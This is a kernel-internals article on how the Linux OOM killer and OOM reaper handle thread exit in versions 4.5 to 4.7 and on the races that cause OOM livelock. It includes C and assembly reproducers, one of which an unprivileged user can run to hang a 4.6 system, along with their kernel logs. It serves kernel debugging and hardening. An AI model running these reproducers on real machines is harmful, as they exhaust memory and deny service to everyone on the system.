Also, there is a comment that "threads which were forcibly terminated but did not get the TIF_MEMDIE flag are no problem, because they have already received the SIGKILL signal and will get TIF_MEMDIE the next time out_of_memory() is called", but there is no guarantee that the TIF_MEMDIE flag is reliably set. (Trap 6)

(Trap 1) through (Trap 6) are pitfalls where an OOM livelock situation can occur because the kernel waits for that condition forever and unconditionally. But you are probably not sure why they can be traps. Therefore, I explain the flow of thread termination (mainly the steps up to disassociating the mm_struct and clearing the TIF_MEMDIE flag).

(exit1)

A terminating thread calls the do_exit() function. If that thread is terminating voluntarily, it will be able to call do_exit() smoothly. But if that thread is being forcibly terminated by the OOM killer, it might be unable to call do_exit() because it is blocked in an unkillable wait.

If the cause of the unkillable wait is a memory allocation request, that thread cannot leave the unkillable wait until that memory allocation succeeds or fails.

If that thread is itself doing a memory allocation request and has already received the SIGKILL signal, the TIF_MEMDIE flag will be set due to (kill2), and that thread can complete the memory allocation request. But if that thread is waiting for other threads which are doing memory allocation requests with locks held, those threads cannot complete their memory allocation requests unless the TIF_MEMDIE flag is set on them due to (kill2) or (kill9).

That is, (Trap 2) is "a typical OOM livelock situation which occurs when the OOM killer was invoked", and it is caused by TIF_MEMDIE not being set on the threads doing memory allocation.

Also, (Trap 6) is caused by the fact that, as explained at (kill1), the OOM killer is not invoked unless the allocation request either "has order 3 or lower and contains the __GFP_FS flag" or "contains the __GFP_NOFAIL flag". For example, if that thread is doing a GFP_NOFS or GFP_NOIO allocation request of order 3 or lower, the TIF_MEMDIE flag will not be set on that thread due to (kill2) even if that thread has already received the SIGKILL signal. And an OOM livelock situation occurs due to the "too small to fail" memory-allocation rule, because that memory allocation request loops forever as long as the OOM killer is not called.

And (Trap 1) occurs as follows: one thread gets TIF_MEMDIE due to (kill2), completes its memory allocation request, and then starts waiting for memory allocations by other threads, but TIF_MEMDIE is not set on those other threads due to (kill5).

(exit2)

The steps from here on assume that the terminating thread was able to call do_exit().

A terminating thread gets the PF_EXITING flag, which indicates that "this thread is terminating", by calling exit_signals(). This allows the current thread to get TIF_MEMDIE due to (kill2).

(exit3)

A terminating thread calls exit_mm() in order to release mm_struct.

In exit_mm(), mmap_sem is taken in shared mode (down_read(&current->mm->mmap_sem)) in order to synchronize with forced termination due to invalid memory access (the core dump operation).

Taking mmap_sem in shared mode implies that some other location takes mmap_sem in exclusive mode. While there are several locations which take mmap_sem in exclusive mode, a typical one is the mmap() operation. mmap() takes mmap_sem in exclusive mode (down_write(&current->mm->mmap_sem)) and then does memory allocation requests. Therefore, (Trap 3) happens as follows. Thread-A in a multi-threaded process is in an unkillable wait at down_read(&current->mm->mmap_sem) after its PF_EXITING flag was set. Thread-B does a memory allocation request after down_write(&current->mm->mmap_sem) and tries to invoke the OOM killer. But the OOM killer waits for thread-A, which already has the PF_EXITING flag, to release its mm_struct, because the OOM killer fails to understand that thread-B needs to release mmap_sem held in exclusive mode before thread-A can release the mm_struct.

(Trap 5) is caused by other threads which have passed down_write(&current->mm->mmap_sem) being blocked in an unkillable wait (inside or outside of a memory allocation request) and thus being unable to release mmap_sem held in exclusive mode.

Similarly, (Trap 4) is caused by not sending SIGKILL to other threads which have passed down_write(&current->mm->mmap_sem) and are blocked in an unkillable or killable wait.

(exit4)

If mmap_sem was successfully taken in shared mode, the current thread performs a core dump operation if needed. Then, the current thread releases the mm_struct and mmap_sem.

But there is no guarantee that memory is reclaimed as free memory immediately after the mm_struct is released. If the current thread is one of the threads in a multi-threaded program, memory cannot be reclaimed as free memory until all threads using that mm_struct have released it. Thus, mmput(current->mm) is called in order to release only the current thread's use of the mm_struct. Upon returning from mmput(current->mm), the TIF_MEMDIE flag is cleared because the memory which can be reclaimed is considered to have been reclaimed, and the OOM killer starts selecting other threads.

mmput() decrements a refcount and performs the memory reclaim operation only when that refcount drops to 0. The memory reclaim operation includes operations (such as waiting for completion of asynchronous I/O) which can be blocked by memory allocation requests. Since the mm_struct has been released but the TIF_MEMDIE flag is not yet cleared, threads doing memory allocation requests fall into the (Trap 2) situation, where the OOM killer cannot be invoked due to the behavior explained at (kill5).
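The refcount behavior of mmput() can be illustrated with a tiny user-space model. struct model_mm and model_mmput() are hypothetical names, and the "reclaim" here is only a flag. The point of the sketch is that only the last caller triggers the reclaim, so a thread which got TIF_MEMDIE may return from its own mmput() without freeing anything.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct model_mm {
        int users;       /* how many threads still use this mm */
        bool reclaimed;  /* set once the last user has gone */
};

/* Returns true only for the call which actually reclaimed the memory. */
bool model_mmput(struct model_mm *mm)
{
        assert(mm != NULL && mm->users > 0);
        if (--mm->users > 0)
                return false;   /* somebody else still uses the memory */
        mm->reclaimed = true;   /* the real reclaim may block here */
        return true;
}
```

For a process with three threads, the first two calls return false and leave all memory in place; only the third call reclaims it.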

Since memory is considered to be still reclaimable until the exiting thread returns from mmput(), allocating threads do not want to invoke the OOM killer. But there is a blank period during which allocating threads cannot know that they are in a situation where they cannot make forward progress without invoking the OOM killer.

(exit5)

After returning from exit_mm(), the rest of cleanup operations such as closing file descriptors are performed. Since mm_struct was already released, the behavior explained at (kill2) is no longer applied. If memory allocation requests caused by the rest of cleanup operations invoked the OOM killer, the OOM killer selects other threads.

What do you think? The exclusion control which the OOM killer uses in order "not to kill more processes than necessary" did not take race conditions with other threads into account, and did not consider cases where threads which are expected to release their mm_struct are blocked. What an optimistic approach!

Therefore, introducing the OOM reaper, which handles cases where threads which are expected to release their mm_struct are blocked, becomes a solution for the OOM livelock problem when the OOM killer could be invoked.

The OOM reaper, which was discussed at the LSF/MM summit held in March 2015 and was introduced in Linux 4.6, reduces the possibility of falling into an OOM livelock situation by reclaiming memory used by a thread group which was terminated by the OOM killer, before the mm_struct used by that thread group is released.


5.2 The flow of OOM killer in Linux 4.6

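So, I explain the flow of the OOM killer as of Linux 4.6.

(kill1)

Omitted because it is the same as (kill1) in Linux 4.5.

(kill2)

Omitted because it is the same as (kill2) in Linux 4.5.

(kill3)

Omitted because it is the same as (kill3) in Linux 4.5.

(kill4)

Omitted because it is the same as (kill4) in Linux 4.5.

(kill5)

oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer.

In order to close the blank period which can cause an OOM livelock situation, the handling of the task_will_free_mem(task) case in oom_scan_process_thread() was removed.

Everything else is the same as (kill5) in Linux 4.5.

(kill6)

Omitted because it is the same as (kill6) in Linux 4.5.

(kill7)

Omitted because it is the same as (kill7) in Linux 4.5.

(kill8)

Omitted because it is the same as (kill8) in Linux 4.5.

(kill9)

Omitted because it is the same as (kill9) in Linux 4.5.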

(kill10)

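The OOM killer also sends the SIGKILL signal to other thread groups which use the mm_struct of the thread being forcibly terminated, if they are suitable for forced termination by the OOM killer.

Then, if all thread groups using that mm_struct are suitable for forced termination by the OOM killer, the OOM reaper is invoked.

(kill11)

The OOM reaper tries to take mmap_sem in shared mode.

Only if that succeeds, it frees the reclaimable pages among the memory belonging to that mm_struct, and then releases mmap_sem.

Note that the processing which mmput() does when all threads have released the mm_struct has not been performed at this point. But since most of the reclaimable memory can be considered reclaimed, when the OOM reaper was able to operate normally (i.e. was able to take mmap_sem in shared mode), it clears the TIF_MEMDIE flag and sets oom_score_adj to -1000 so that the thread group containing that thread will not be selected by the OOM killer again. (Trap 7)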
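The behavior at (kill11) can be summarized with the following user-space sketch. It is only a model under my assumptions: struct model_victim and model_oom_reap() are hypothetical names, the trylock on mmap_sem is reduced to a boolean, and "freeing pages" is reduced to a counter.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct model_victim {
        bool mmap_sem_held_exclusive;     /* some thread holds it for write */
        unsigned long reclaimable_pages;  /* pages the reaper could free */
        bool tif_memdie;
        int oom_score_adj;
};

/* Returns the number of pages freed by this attempt. */
unsigned long model_oom_reap(struct model_victim *v)
{
        unsigned long freed;

        assert(v != NULL);
        if (v->mmap_sem_held_exclusive)
                return 0;       /* could not take mmap_sem; nothing changes */
        freed = v->reclaimable_pages;
        v->reclaimable_pages = 0;
        v->tif_memdie = false;          /* let the OOM killer select again */
        v->oom_score_adj = -1000;       /* but never select this one again */
        return freed;
}
```

Note that the flag is cleared and oom_score_adj is updated no matter how few pages were freed. A victim with almost no memory therefore gives almost nothing back, which is the situation the reproducer later in this section is designed to create.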

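The flow of thread termination is omitted because it is the same as in Linux 4.5.

(Trap 7) is a location where an OOM livelock situation can occur. But why can it be a trap?

First, about the reason why the OOM reaper clears TIF_MEMDIE.

The OOM killer makes the process which consumes the most memory (after taking the oom_score_adj value into account) the candidate for forced termination. But as explained at (kill8), if there is a child process which is suitable for forced termination by the OOM killer, it selects that child process. And it is possible that the child process's memory consumption is close to 0 no matter how much memory the parent process consumes. For example, if we make the OOM killer select child processes whose memory consumption is close to 0, as shown below, the OOM reaper can reclaim almost no memory.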

---------- oom-write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
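        /* Spawn 10 tiny children which keep appending to /tmp/file. */
        for (i = 0; i < 10; i++) {
                if (fork() == 0) {
                        close(1);
                        /* Normally fd 1 is the lowest free one, so the file becomes stdout. */
                        open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
                        execl("./write", "./write", NULL);
                        _exit(1);
                }
        }
        /* Keep doubling the buffer until realloc() fails. Nothing is touched yet. */
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /* Give the children time to start writing. */
        sleep(5);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();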
        return 0;
}
---------- oom-write.c ----------
---------- write.asm ----------
; nasm -f elf write.asm && ld -s -m elf_i386 -o write write.o
section .text
    CPU 386
    global _start
_start:
; while (write(1, buf, 4096) == 4096);
    mov eax, 4 ; NR_write
    mov ebx, 1
    mov ecx, _start - 96
    mov edx, 4096
    int 0x80
    cmp eax, 4096
    je _start
; pause();
    mov eax, 29 ; NR_pause
    int 0x80
; _exit(0);
    mov eax, 1 ; NR_exit
    mov ebx, 0
    int 0x80
---------- write.asm ----------
---------- Example output start ----------
[   78.157198] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO)
(...snipped...)
[   78.325409] [ 3805]  1000  3805   541715   357876     708       6        0             0 oom-write
[   78.327978] [ 3806]  1000  3806       39        1       3       2        0             0 write
[   78.330149] [ 3807]  1000  3807       39        1       3       2        0             0 write
[   78.332167] [ 3808]  1000  3808       39        1       3       2        0             0 write
[   78.334488] [ 3809]  1000  3809       39        1       3       2        0             0 write
[   78.336471] [ 3810]  1000  3810       39        1       3       2        0             0 write
[   78.338414] [ 3811]  1000  3811       39        1       3       2        0             0 write
[   78.340709] [ 3812]  1000  3812       39        1       3       2        0             0 write
[   78.342711] [ 3813]  1000  3813       39        1       3       2        0             0 write
[   78.344727] [ 3814]  1000  3814       39        1       3       2        0             0 write
[   78.346613] [ 3815]  1000  3815       39        1       3       2        0             0 write
[   78.348829] Out of memory: Kill process 3805 (oom-write) score 808 or sacrifice child
[   78.350818] Killed process 3806 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB
[   78.455314] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO)
(...snipped...)
[   78.631333] [ 3805]  1000  3805   541715   361440     715       6        0             0 oom-write
[   78.633802] [ 3807]  1000  3807       39        1       3       2        0             0 write
[   78.635977] [ 3808]  1000  3808       39        1       3       2        0             0 write
[   78.638325] [ 3809]  1000  3809       39        1       3       2        0             0 write
[   78.640463] [ 3810]  1000  3810       39        1       3       2        0             0 write
[   78.642837] [ 3811]  1000  3811       39        1       3       2        0             0 write
[   78.644924] [ 3812]  1000  3812       39        1       3       2        0             0 write
[   78.646990] [ 3813]  1000  3813       39        1       3       2        0             0 write
[   78.649039] [ 3814]  1000  3814       39        1       3       2        0             0 write
[   78.651242] [ 3815]  1000  3815       39        1       3       2        0             0 write
[   78.653326] Out of memory: Kill process 3805 (oom-write) score 816 or sacrifice child
[   78.655235] Killed process 3807 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB
[   88.776446] MemAlloc-Info: 1 stalling task, 1 dying task, 1 victim task.
[   88.778228] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=10000
[   88.780158] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[   98.915687] MemAlloc-Info: 8 stalling task, 1 dying task, 1 victim task.
[   98.917888] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=14885 uninterruptible
[   98.920297] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=20139
[   98.922652] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=16231
[   98.924874] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=20044
[   98.927043] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=10230 uninterruptible
[   98.929405] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=14716
[   98.931559] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=14887
[   98.933843] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=14887 uninterruptible exiting
[   98.936460] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[  140.356230] MemAlloc-Info: 9 stalling task, 1 dying task, 1 victim task.
[  140.358448] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=56326 uninterruptible
[  140.360979] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=61580 uninterruptible
[  140.363716] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=57672
[  140.365983] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=61485 uninterruptible
[  140.368521] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=51671 uninterruptible
[  140.371128] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=56157 uninterruptible
[  140.373548] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=48147
[  140.375722] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=56328 uninterruptible
[  140.378647] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=56328 exiting
[  140.381695] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[  150.493557] MemAlloc-Info: 7 stalling task, 1 dying task, 1 victim task.
[  150.495725] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=66463
[  150.497897] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=71717 uninterruptible
[  150.500490] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=71622 uninterruptible
[  150.502940] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=61808
[  150.505122] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=66294 uninterruptible
[  150.507521] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=58284
[  150.509678] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=66465 uninterruptible
[  150.512333] MemAlloc: write(3807) uninterruptible dying victim
---------- Example output end ----------

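Therefore, if the OOM reaper could not reclaim enough memory to resolve the OOM situation, the system falls into an OOM livelock situation. To avoid this, TIF_MEMDIE is cleared after memory has been reclaimed.

Next, let us look at why the OOM reaper sets oom_score_adj to -1000.

Even after the OOM reaper has reclaimed memory from the child process chosen by the OOM killer, that child process keeps being selected by the OOM killer until it releases its mm_struct. When the OOM killer selects a process whose reclaimable memory has already been reclaimed, the OOM reaper cannot reclaim anything more, so the system falls into an OOM livelock situation. To avoid this, oom_score_adj is set to -1000. (Trap 8)

However, this behavior created a new trap: an OOM livelock situation which unprivileged users could not trigger up to Linux 4.5 can be triggered by unprivileged users in Linux 4.6. Can you see in which case you would step on (Trap 8)? The hint is "twisted multithreading".


When the clone() system call is invoked with CLONE_VM but without CLONE_SIGHAND, thread groups which refer to the same mm_struct but have different /proc/$pid/oom_score_adj values are created.

Among all the threads referring to the same mm_struct, the OOM killer sets TIF_MEMDIE on only one thread. And the OOM reaper, at the same time as it clears TIF_MEMDIE from that thread, sets oom_score_adj to -1000 only for the thread group containing that thread.

As a result, it became possible to create "super-twisted multithreading": among the thread groups referring to the same mm_struct, exactly one is in the state "not eligible to be killed by the OOM killer / not eligible for memory reclaim by the OOM reaper", while all the others are in the state "eligible to be killed by the OOM killer".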

---------- oom-write2.c ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int writer(void *unused)
{
        static char buffer[4096];
        int fd = open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
        while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer));
        return 0;
}

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
        if (fork() == 0) {
                int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                write(fd, "1000", 4);
                close(fd);
                for (i = 0; i < 2; i++) {
                        char *stack = malloc(4096);
                        if (stack)
                                clone(writer, stack + 4096, CLONE_VM, NULL);
                }
                writer(NULL);
                while (1)
                        pause();
        }
        sleep(1);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(5);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();
        return 0;
}
---------- oom-write2.c ----------
---------- Example output start ----------
[  177.722853] a.out invoked oom-killer: gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|__GFP_ZERO), order=0, oom_score_adj=0
[  177.724956] a.out cpuset=/ mems_allowed=0
[  177.725735] CPU: 3 PID: 3962 Comm: a.out Not tainted 4.5.0-rc2-next-20160204 #291
(...snipped...)
[  177.802889] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[  177.872248] [ 3941]  1000  3941    28880      124      14       3        0             0 bash
[  177.874279] [ 3962]  1000  3962   541717   395780     784       6        0             0 a.out
[  177.876274] [ 3963]  1000  3963     1078       21       7       3        0          1000 a.out
[  177.878261] [ 3964]  1000  3964     1078       21       7       3        0          1000 a.out
[  177.880194] [ 3965]  1000  3965     1078       21       7       3        0          1000 a.out
[  177.882262] Out of memory: Kill process 3963 (a.out) score 998 or sacrifice child
[  177.884129] Killed process 3963 (a.out) total-vm:4312kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB
[  177.887100] oom_reaper: reaped process :3963 (a.out) anon-rss:0kB, file-rss:0kB, shmem-rss:0lB
[  179.638399] crond invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[  179.647708] crond cpuset=/ mems_allowed=0
[  179.652996] CPU: 3 PID: 742 Comm: crond Not tainted 4.5.0-rc2-next-20160204 #291
(...snipped...)
[  179.771311] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[  179.836221] [ 3941]  1000  3941    28880      124      14       3        0             0 bash
[  179.838278] [ 3962]  1000  3962   541717   396308     785       6        0             0 a.out
[  179.840328] [ 3963]  1000  3963     1078        0       7       3        0         -1000 a.out
[  179.842443] [ 3965]  1000  3965     1078        0       7       3        0          1000 a.out
[  179.844557] Out of memory: Kill process 3965 (a.out) score 998 or sacrifice child
[  179.846404] Killed process 3965 (a.out) total-vm:4312kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
---------- Example output end ----------

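As a result, for the thread group that was already reaped by the first OOM reaper invocation, the second and later OOM reaper invocations no longer take place, and since nobody clears the TIF_MEMDIE flag, the system fell into an OOM livelock situation.

If the check in (kill10) for whether a thread group is eligible to be killed by the OOM killer had also checked whether the thread group had already received the SIGKILL signal, the OOM reaper could have been invoked and the system would not have fallen into an OOM livelock situation.

As a lesson from this, Linux 4.7 was changed so that, instead of setting oom_score_adj of all thread groups to -1000, a flag named MMF_OOM_REAPED is set on the mm_struct. As this shows, for processing under OOM conditions, where we cannot predict what will happen, it is important to always assume the worst case and prepare for it.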
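
The difference between the Linux 4.6 and Linux 4.7 marking schemes can be pictured with a small user-space model. This is only a sketch under assumptions: struct model_mm, struct model_group and the three helper functions are hypothetical names invented for illustration and are not kernel code. Only the -1000 value and the idea of a "reaped" flag kept on the mm_struct come from the explanation above.

```c
#include <stdbool.h>

#define MODEL_SCORE_ADJ_MIN (-1000)

/* Hypothetical stand-in for mm_struct: only the "already reaped" bit. */
struct model_mm {
        bool oom_reaped; /* models MMF_OOM_REAPED */
};

/* Hypothetical stand-in for a thread group. */
struct model_group {
        int oom_score_adj;
        struct model_mm *mm;
};

/* Linux 4.6 style: only the victim's own thread group is marked. */
static void mark_reaped_46(struct model_group *victim)
{
        victim->oom_score_adj = MODEL_SCORE_ADJ_MIN;
}

/* Linux 4.7 style: the shared mm is marked, covering every group using it. */
static void mark_reaped_47(struct model_group *victim)
{
        victim->mm->oom_reaped = true;
}

/* Would the (modelled) OOM killer still consider this group a candidate? */
static bool still_candidate(const struct model_group *g)
{
        if (g->oom_score_adj == MODEL_SCORE_ADJ_MIN)
                return false;
        return !g->mm->oom_reaped;
}
```

With two model_group objects pointing at the same model_mm, mark_reaped_46() on one of them leaves the other a candidate (the "super-twisted multithreading" case), while mark_reaped_47() removes both from consideration.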


5.3 The flow of OOM killer in Linux 4.7

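So, here is the flow of the OOM killer as of Linux 4.7.

(kill1)

out_of_memory() (the OOM killer) is called when a memory allocation request with order 3 or less, or a memory allocation request containing the __GFP_NOFAIL flag, was made but free memory could not be obtained (that is, an OOM situation occurred).

(kill2)

If the current thread has already received the SIGKILL signal, or if the thread group containing the current thread is already exiting (the SIGNAL_GROUP_EXIT flag is set), free memory may become available when the thread group containing the current thread releases its mm_struct. Therefore, to avoid killing more processes than necessary, the TIF_MEMDIE flag is set on the current thread.

In addition, if all the thread groups using that mm_struct are exiting, the OOM reaper is also invoked.

After that, it returns to the caller.

If the memory allocation request contains neither the __GFP_FS flag nor the __GFP_NOFAIL flag, it returns to the caller without doing anything.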

(kill3)

Omitted because it is the same as (kill3) in Linux 4.5.

(kill4)

select_bad_process() calls oom_scan_process_thread() for every thread group that exists on the system.

Otherwise it is the same as (kill4) in Linux 4.5.

(kill5)

oom_scan_process_thread() decides whether the thread group can be a candidate to be killed by the OOM killer.

The check for the TIF_MEMDIE flag is now done per thread group containing the thread, rather than per thread.

Otherwise it is the same as (kill5) in Linux 4.6.

(kill6)

oom_badness() judges how much the thread contributes to the OOM situation.

In deciding whether killing is appropriate, it now checks not only whether the oom_score_adj value is -1000 but also whether the MMF_OOM_REAPED flag is set.

Otherwise it is the same as (kill6) in Linux 4.5.

(kill7)

Omitted because it is the same as (kill7) in Linux 4.5.

(kill8)

oom_kill_process() performs the processing for actually sending the SIGKILL signal and killing the victim.

First, if the thread group is already exiting, free memory may become available when that thread group releases its mm_struct. Therefore, to avoid killing more processes than necessary, the TIF_MEMDIE flag is set on that thread.

In addition, if all the thread groups using that mm_struct are exiting, the OOM reaper is also invoked.

After that, it returns to the caller.

(kill9)

Omitted because it is the same as (kill9) in Linux 4.5.

(kill10)

Omitted because it is the same as (kill10) in Linux 4.6.

(kill11)

If mmap_sem was taken successfully, a flag named MMF_OOM_REAPED is set on that mm_struct instead of setting oom_score_adj to -1000.

Otherwise it is the same as (kill11) in Linux 4.6.

As of Linux 4.6, it was possible to cause an OOM livelock situation by using mmap() to create contention on down_write(&mm->mmap_sem) and thereby obstruct the OOM reaper. Therefore, Linux 4.7 introduced down_write_killable(), and by replacing down_write(&mm->mmap_sem) with down_write_killable(&mm->mmap_sem), the possibility of getting stuck at down_read(&mm->mmap_sem) in exit_mm() was considerably reduced.

Still, the possibility of getting stuck in an unkillable wait between down_write_killable(&mm->mmap_sem) and up_write(&mm->mmap_sem) remains. For example, it occurs when a program like the following is executed.

---------- torture8.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/mman.h>

static int memory_eater(void *unused)
{
        const int fd = open("/proc/self/exe", O_RDONLY);
        srand(getpid());
        while (1) {
                int size = rand() % 1048576;
                void *ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
                munmap(ptr, size);
        }
        return 0;
}

static int self_killer(void *unused)
{
        srand(getpid());
        poll(NULL, 0, rand() % 1000);
        kill(getpid(), SIGKILL);
        return 0;
}

static void child(void)
{
        static char *stack[256] = { };
        char buf[32] = { };
        int i;
        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
        write(fd, "1000", 4);
        close(fd);
        snprintf(buf, sizeof(buf), "tgid=%u", getpid());
        prctl(PR_SET_NAME, (unsigned long) buf, 0, 0, 0);
        for (i = 0; i < 256; i++)
                stack[i] = malloc(4096 * 2);
        for (i = 1; i < 256 - 2; i++)
                if (clone(memory_eater, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                        _exit(1);
        if (clone(memory_eater, stack[i++] + 8192, CLONE_VM, NULL) == -1)
                _exit(1);
        if (clone(self_killer, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                _exit(1);
        _exit(0);
}

int main(int argc, char *argv[])
{
        static cpu_set_t set = { { 1 } };
        sched_setaffinity(0, sizeof(set), &set);
        if (fork() > 0) {
                char *buf = NULL;
                unsigned long size;
                unsigned long i;
                sleep(1);
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                /* Will cause OOM due to overcommit */
                for (i = 0; i < size; i += 4096)
                        buf[i] = 0;
                while (1)
                        pause();
        }
        while (1)
                if (fork() == 0)
                        child();
                else
                        wait(NULL);
        return 0;
}
---------- torture8.c ----------
---------- Example output start ----------
[  156.182149] oom_reaper: reaped process 13333 (tgid=13079), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  157.113150] oom_reaper: reaped process 4372 (tgid=4118), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  157.995910] oom_reaper: reaped process 11029 (tgid=10775), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  158.181043] oom_reaper: reaped process 11285 (tgid=11031), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  169.049766] oom_reaper: reaped process 11541 (tgid=11287), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  169.323695] oom_reaper: reaped process 11797 (tgid=11543), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  176.294340] oom_reaper: reaped process 12309 (tgid=12055), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  240.458346] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729
[  241.950461] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729
[  301.956044] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729
[  303.654382] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729
[  349.771068] oom_reaper: reaped process 13589 (tgid=13335), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  349.996636] oom_reaper: reaped process 13845 (tgid=13591), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  350.704767] oom_reaper: reaped process 14357 (tgid=14103), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  351.656833] Out of memory: Kill process 5652 (tgid=5398) score 999 or sacrifice child
[  351.659127] Killed process 5652 (tgid=5398) total-vm:6348kB, anon-rss:1116kB, file-rss:12kB, shmem-rss:0kB
[  352.664419] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  357.238418] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  358.621747] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  359.970605] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  361.423518] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  362.704023] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  363.832115] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=25279
[  364.148948] MemAlloc: tgid=5398(5652) flags=0x400040 switches=266 dying victim
[  364.150851] tgid=5398       R  running task    12920  5652      1 0x00100084
[  364.152773]  ffff88000637fbe8 ffffffff8172b257 000091fa78a0caf8 ffff8800389de440
[  364.154843]  ffff880006376440 ffff880006380000 ffff880078a0caf8 ffff880078a0caf8
[  364.156898]  ffff880078a0cb10 ffff880078a0cb00 ffff88000637fc00 ffffffff81725e1a
[  364.158972] Call Trace:
[  364.159979]  [<ffffffff8172b257>] ? _raw_spin_unlock_irq+0x27/0x50
[  364.161691]  [<ffffffff81725e1a>] schedule+0x3a/0x90
[  364.163170]  [<ffffffff8172a366>] rwsem_down_write_failed+0x106/0x220
[  364.164925]  [<ffffffff813bd2c7>] call_rwsem_down_write_failed+0x17/0x30
